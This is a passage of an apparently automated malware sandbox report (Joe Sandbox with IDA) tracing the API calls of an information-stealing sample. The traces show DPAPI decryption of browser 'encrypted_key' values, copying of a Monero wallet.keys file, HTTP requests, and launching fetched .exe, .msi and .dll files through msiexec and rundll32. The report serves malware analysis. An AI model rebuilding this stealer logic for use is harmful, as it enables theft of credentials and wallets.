                                            • StrStrA.SHLWAPI(?,007CAAD0,00420B52), ref: 0040CAF7
                                            • StrStrA.SHLWAPI(00000000,007CAD10), ref: 0040CB1E
                                            • StrStrA.SHLWAPI(?,007CB678,00000000,?,00421458,00000000,?,00000000,00000000,?,0079D3B0,00000000,?,00421454,00000000,?), ref: 0040CCA2
                                            • StrStrA.SHLWAPI(00000000,007CB698), ref: 0040CCB9
                                              • Part of subcall function 0040C820: memset.MSVCRT ref: 0040C853
                                              • Part of subcall function 0040C820: lstrlenA.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,0079D4F0), ref: 0040C871
                                              • Part of subcall function 0040C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040C87C
                                              • Part of subcall function 0040C820: memcpy.MSVCRT(?,?,?), ref: 0040C912
                                            • StrStrA.SHLWAPI(?,007CB698,00000000,?,0042145C,00000000,?,00000000,0079D4F0), ref: 0040CD5A
                                            • StrStrA.SHLWAPI(00000000,0079D650), ref: 0040CD71
                                              • Part of subcall function 0040C820: lstrcatA.KERNEL32(?,00420B46), ref: 0040C943
                                              • Part of subcall function 0040C820: lstrcatA.KERNEL32(?,00420B47), ref: 0040C957
                                              • Part of subcall function 0040C820: lstrcatA.KERNEL32(?,00420B4E), ref: 0040C978
                                            • lstrlenA.KERNEL32(00000000), ref: 0040CE44
                                            • CloseHandle.KERNEL32(00000000), ref: 0040CE9C
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2280583655.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2280583655.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$??2@BinaryCloseCreateCryptHandleReadSizeStringmemcpymemset
                                            • String ID:
                                            • API String ID: 3555725114-3916222277
                                            • Opcode ID: bdcf7920c9ab84c4787d47d5031650711a85c06ed1b0856f23742556519dcaf9
                                            • Instruction ID: fb2464dfdb87d028b9341c66972094ccea7bc9213c5b9a6eafc00a4a54def107
                                            • Opcode Fuzzy Hash: bdcf7920c9ab84c4787d47d5031650711a85c06ed1b0856f23742556519dcaf9
                                            • Instruction Fuzzy Hash: 2FE13E71911108ABCB14FBA1DC91FEEB779AF14314F40416EF10673191EF386A9ACB6A
                                            APIs
                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                            • RegOpenKeyExA.ADVAPI32(00000000,007C7BA8,00000000,00020019,00000000,004205B6), ref: 004183A4
                                            • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00418426
                                            • wsprintfA.USER32 ref: 00418459
                                            • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0041847B
                                            • RegCloseKey.ADVAPI32(00000000), ref: 0041848C
                                            • RegCloseKey.ADVAPI32(00000000), ref: 00418499
                                              • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2280583655.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2280583655.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CloseOpenlstrcpy$Enumwsprintf
                                            • String ID: - $%s\%s$?
                                            • API String ID: 3246050789-3278919252
                                            • Opcode ID: 10eb0c450f8aa63e58ce6e2e13bbd26e49cdc9fd0544e95f6096289088943245
                                            • Instruction ID: f03ee3f6de4a678c4a24becac03c3675d5d4362b87af83515ad79f9b006405b7
                                            • Opcode Fuzzy Hash: 10eb0c450f8aa63e58ce6e2e13bbd26e49cdc9fd0544e95f6096289088943245
                                            • Instruction Fuzzy Hash: B4813E75911118ABEB24DF50CD81FEAB7B9FF08714F008299E109A6180DF756BC6CFA5
                                            APIs
                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                            • memset.MSVCRT ref: 00410C1C
                                            • lstrcatA.KERNEL32(?,00000000), ref: 00410C35
                                            • lstrcatA.KERNEL32(?,00420D7C), ref: 00410C47
                                            • lstrcatA.KERNEL32(?,00000000), ref: 00410C5D
                                            • lstrcatA.KERNEL32(?,00420D80), ref: 00410C6F
                                            • lstrcatA.KERNEL32(?,00000000), ref: 00410C88
                                            • lstrcatA.KERNEL32(?,00420D84), ref: 00410C9A
                                            • lstrlenA.KERNEL32(?), ref: 00410CA7
                                            • memset.MSVCRT ref: 00410CCD
                                            • memset.MSVCRT ref: 00410CE1
                                              • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,0079D410,?,0042110C,?,00000000), ref: 0041A82B
                                              • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                              • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,00799AC8,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                              • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                              • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                              • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                              • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                              • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                              • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                              • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                              • Part of subcall function 004196C0: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,00410B85,?,00000000,?,00000000,004205C6,004205C5), ref: 004196E1
                                            • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00420D88,?,00000000), ref: 00410D5A
                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00410D66
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2280583655.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2280583655.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$lstrcpy$lstrlenmemset$Create$FileObjectProcessSingleSystemTimeWait
                                            • String ID: .exe
                                            • API String ID: 1395395982-4119554291
                                            • Opcode ID: 74a2b4eb823f66a7a773147b1627efd196d727e2fc86b427189f4ea67f13cdff
                                            • Instruction ID: 8c4414bd7b792449c86a3c64e171a12ac7102eaeec46e1acf96b3d3d4dd6cf75
                                            • Opcode Fuzzy Hash: 74a2b4eb823f66a7a773147b1627efd196d727e2fc86b427189f4ea67f13cdff
                                            • Instruction Fuzzy Hash: A78194B55111186BCB14FBA1CD52FEE7338AF44308F40419EB30A66082DE786AD9CF6E
                                            APIs
                                            • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0041906C
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2280583655.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2280583655.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateGlobalStream
                                            • String ID: image/jpeg
                                            • API String ID: 2244384528-3785015651
                                            • Opcode ID: e883d83a5a88c000208a0b3536991fc9b742a1aee5e23c3149dc995228aa81a1
                                            • Instruction ID: d6dc09ab2bfedf2d54b470b914d8c7211c5e4dd185e8bb692af35d1d417654b8
                                            • Opcode Fuzzy Hash: e883d83a5a88c000208a0b3536991fc9b742a1aee5e23c3149dc995228aa81a1
                                            • Instruction Fuzzy Hash: 7D711B75A40208BBDB04EFE4DC99FEEB7B9FB48300F108509F515A7290DB38A945CB65
                                            APIs
                                            • strtok_s.MSVCRT ref: 00411307
                                            • strtok_s.MSVCRT ref: 00411750
                                              • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,0079D410,?,0042110C,?,00000000), ref: 0041A82B
                                              • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2280583655.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2280583655.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: strtok_s$lstrcpylstrlen
                                            • String ID:
                                            • API String ID: 348468850-0
                                            • Opcode ID: bde3d88e76cb374dc77a589280481c748b3d98596421ad73c644b27d853b8bc6
                                            • Instruction ID: 4a233ae47f87f64f9a2ed81d2cca976e3c75948f423937a2df4e62cfbc7c3e06
                                            • Opcode Fuzzy Hash: bde3d88e76cb374dc77a589280481c748b3d98596421ad73c644b27d853b8bc6
                                            • Instruction Fuzzy Hash: C7C1D6B5941218ABCB14EF60DC89FEA7379BF54304F00449EF50AA7241DB78AAC5CF95
                                            APIs
                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                            • ShellExecuteEx.SHELL32(0000003C), ref: 004131C5
                                            • ShellExecuteEx.SHELL32(0000003C), ref: 0041335D
                                            • ShellExecuteEx.SHELL32(0000003C), ref: 004134EA
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2280583655.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2280583655.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ExecuteShell$lstrcpy
                                            • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                            • API String ID: 2507796910-3625054190
                                            • Opcode ID: f416c3abd8d48d8571a1066b95692cbdeaad0712c422f8a8d0e8344c420d34f1
                                            • Instruction ID: 17233f41fb1950bff335544576ea1941aa871c2d7c6c7a5a475621d351ca9112
                                            • Opcode Fuzzy Hash: f416c3abd8d48d8571a1066b95692cbdeaad0712c422f8a8d0e8344c420d34f1
                                            • Instruction Fuzzy Hash: 96125F718111089ADB09FBA1DD92FEEB778AF14314F50415EF10666091EF382BDACF6A
                                            APIs
                                            • memset.MSVCRT ref: 023F4505
                                            • memset.MSVCRT ref: 023F451C
                                              • Part of subcall function 023F9047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 023F9072
                                            • lstrcat.KERNEL32(?,00000000), ref: 023F4553
                                            • lstrcat.KERNEL32(?,0064A30C), ref: 023F4572
                                            • lstrcat.KERNEL32(?,?), ref: 023F4586
                                            • lstrcat.KERNEL32(?,0064A5D8), ref: 023F459A
                                              • Part of subcall function 023FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 023FA9EF
                                              • Part of subcall function 023F8FF7: GetFileAttributesA.KERNEL32(00000000,?,023E1DBB,?,?,00425654,?,?,00420E1F), ref: 023F9006
                                              • Part of subcall function 023E9F47: StrStrA.SHLWAPI(00000000,004212AC), ref: 023E9FA0
                                              • Part of subcall function 023E9F47: memcmp.MSVCRT(?,0042125C,00000005), ref: 023E9FF9
                                              • Part of subcall function 023E9C27: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 023E9C53
                                              • Part of subcall function 023E9C27: GetFileSizeEx.KERNEL32(000000FF,?), ref: 023E9C78
                                              • Part of subcall function 023E9C27: LocalAlloc.KERNEL32(00000040,?), ref: 023E9C98
                                              • Part of subcall function 023E9C27: ReadFile.KERNEL32(000000FF,?,00000000,023E16F6,00000000), ref: 023E9CC1
                                              • Part of subcall function 023E9C27: LocalFree.KERNEL32(023E16F6), ref: 023E9CF7
                                              • Part of subcall function 023E9C27: CloseHandle.KERNEL32(000000FF), ref: 023E9D01
                                              • Part of subcall function 023F9627: GlobalAlloc.KERNEL32(00000000,023F4644,023F4644), ref: 023F963A
                                            • StrStrA.SHLWAPI(?,0064A0D8), ref: 023F465A
                                            • GlobalFree.KERNEL32(?), ref: 023F4779
                                              • Part of subcall function 023E9D27: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,023E5155,00000000,00000000), ref: 023E9D56
                                              • Part of subcall function 023E9D27: LocalAlloc.KERNEL32(00000040,?,?,?,023E5155,00000000,?), ref: 023E9D68
                                              • Part of subcall function 023E9D27: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,023E5155,00000000,00000000), ref: 023E9D91
                                              • Part of subcall function 023E9D27: LocalFree.KERNEL32(?,?,?,?,023E5155,00000000,?), ref: 023E9DA6
                                              • Part of subcall function 023EA077: memcmp.MSVCRT(?,00421264,00000003), ref: 023EA094
                                            • lstrcat.KERNEL32(?,00000000), ref: 023F470A
                                            • StrCmpCA.SHLWAPI(?,004208D1), ref: 023F4727
                                            • lstrcat.KERNEL32(00000000,00000000), ref: 023F4739
                                            • lstrcat.KERNEL32(00000000,?), ref: 023F474C
                                            • lstrcat.KERNEL32(00000000,00420FB8), ref: 023F475B
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2281115890.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23e0000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalStringmemcmpmemset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                            • String ID:
                                            • API String ID: 1191620704-0
                                            • Opcode ID: e8d6e6767f46891ec996ef8822d66cebf734f8a34e2b49da607d012598c1f812
                                            • Instruction ID: 1069e8b7b2d910bc70e42fea9c0918bd5954cede75d25b87f873fbdcc6768487
                                            • Opcode Fuzzy Hash: e8d6e6767f46891ec996ef8822d66cebf734f8a34e2b49da607d012598c1f812
                                            • Instruction Fuzzy Hash: 847132B6900218BBDB64FBE0EC45FEE737AAF49300F008598E70996180EA75DB49CF51
                                            APIs
                                            • memset.MSVCRT ref: 0041429E
                                            • memset.MSVCRT ref: 004142B5
                                              • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                            • lstrcatA.KERNEL32(?,00000000), ref: 004142EC
                                            • lstrcatA.KERNEL32(?,007CADD0), ref: 0041430B
                                            • lstrcatA.KERNEL32(?,?), ref: 0041431F
                                            • lstrcatA.KERNEL32(?,007CAB60), ref: 00414333
                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                              • Part of subcall function 00418D90: GetFileAttributesA.KERNEL32(00000000,?,00410117,?,00000000,?,00000000,00420DAB,00420DAA), ref: 00418D9F
                                              • Part of subcall function 00409CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00409D39
                                              • Part of subcall function 00409CE0: memcmp.MSVCRT(?,DPAPI,00000005), ref: 00409D92
                                              • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                              • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                              • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                              • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                              • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                              • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                              • Part of subcall function 004193C0: GlobalAlloc.KERNEL32(00000000,004143DD,004143DD), ref: 004193D3
                                            • StrStrA.SHLWAPI(?,007CC788), ref: 004143F3
                                            • GlobalFree.KERNEL32(?), ref: 00414512
                                              • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409AEF
                                              • Part of subcall function 00409AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00404EEE,00000000,?), ref: 00409B01
                                              • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409B2A
                                              • Part of subcall function 00409AC0: LocalFree.KERNEL32(?,?,?,?,00404EEE,00000000,?), ref: 00409B3F
                                              • Part of subcall function 00409E10: memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                            • lstrcatA.KERNEL32(?,00000000), ref: 004144A3
                                            • StrCmpCA.SHLWAPI(?,004208D1), ref: 004144C0
                                            • lstrcatA.KERNEL32(00000000,00000000), ref: 004144D2
                                            • lstrcatA.KERNEL32(00000000,?), ref: 004144E5
                                            • lstrcatA.KERNEL32(00000000,00420FB8), ref: 004144F4
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2280583655.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2280583655.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalStringmemcmpmemset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                            • String ID:
                                            • API String ID: 1191620704-0
                                            • Opcode ID: 0c9d0826f05218bba3054023445b60d50c1f9f43ea0f6b816602f798d9ef3330
                                            • Instruction ID: 36ee7f3ac4f34f2e69ac811a17adbc1f593ee72d5fdd25ff7e799b1d0bb6bc25
                                            • Opcode Fuzzy Hash: 0c9d0826f05218bba3054023445b60d50c1f9f43ea0f6b816602f798d9ef3330
                                            • Instruction Fuzzy Hash: 0B7165B6900208BBDB14FBE0DC85FEE7379AB88304F00459DF605A7181EA78DB55CB95
                                            APIs
                                            • memset.MSVCRT ref: 00401327
                                              • Part of subcall function 004012A0: GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 004012B4
                                              • Part of subcall function 004012A0: HeapAlloc.KERNEL32(00000000), ref: 004012BB
                                              • Part of subcall function 004012A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004012D7
                                              • Part of subcall function 004012A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012F5
                                              • Part of subcall function 004012A0: RegCloseKey.ADVAPI32(?), ref: 004012FF
                                            • lstrcatA.KERNEL32(?,00000000), ref: 0040134F
                                            • lstrlenA.KERNEL32(?), ref: 0040135C
                                            • lstrcatA.KERNEL32(?,.keys), ref: 00401377
                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                              • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                              • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                              • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                              • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                              • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,00799AC8,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                              • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                              • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                            • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00401465
                                              • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                              • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                              • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                              • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                              • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                              • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                              • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                            • DeleteFileA.KERNEL32(00000000), ref: 004014EF
                                            • memset.MSVCRT ref: 00401516
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2280583655.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2280583655.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Filelstrcpy$lstrcat$AllocCloseHeapLocallstrlenmemset$CopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                            • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                            • API String ID: 1930502592-218353709
                                            • Opcode ID: 6cf062c6fd381a6a74660f90b2272ae47e9394fe5276f9f8339e4e4fc0c12990
                                            • Instruction ID: 456b5fac361f61c5265e43a16bd15ab14158e39c7f71a6669150f14a30e0c61c
                                            • Opcode Fuzzy Hash: 6cf062c6fd381a6a74660f90b2272ae47e9394fe5276f9f8339e4e4fc0c12990
                                            • Instruction Fuzzy Hash: 565164B1D5011897CB15FB61DD91BED733CAF54304F4041ADB60A62092EE385BD9CBAA
                                            APIs
                                              • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                              • Part of subcall function 00406280: InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
                                              • Part of subcall function 00406280: StrCmpCA.SHLWAPI(?,007CC908), ref: 00406303
                                              • Part of subcall function 00406280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
                                              • Part of subcall function 00406280: HttpOpenRequestA.WININET(00000000,GET,?,007CC638,00000000,00000000,00400100,00000000), ref: 00406385
                                              • Part of subcall function 00406280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
                                              • Part of subcall function 00406280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1
                                              • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415318
                                            • lstrlenA.KERNEL32(00000000), ref: 0041532F
                                              • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                            • StrStrA.SHLWAPI(00000000,00000000), ref: 00415364
                                            • lstrlenA.KERNEL32(00000000), ref: 00415383
                                            • strtok.MSVCRT(00000000,?), ref: 0041539E
                                            • lstrlenA.KERNEL32(00000000), ref: 004153AE
                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2280583655.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2280583655.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSendstrtok
                                            • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                            • API String ID: 3532888709-1526165396
                                            • Opcode ID: 55afdb5b044d9d0ae2ca40548a036d1fafadf4502d9a6ff2b082a7fa121a3b9b
                                            • Instruction ID: 2e955e57ea7f1c083e6e45f715f374ff83ee784ca3e0e9be4ff8c8b21657e330
                                            • Opcode Fuzzy Hash: 55afdb5b044d9d0ae2ca40548a036d1fafadf4502d9a6ff2b082a7fa121a3b9b
                                            • Instruction Fuzzy Hash: 1A514130911108EBCB14FF61CD92AED7779AF50358F50402EF80A6B591DF386B96CB6A
                                            APIs
                                              • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                              • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                              • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
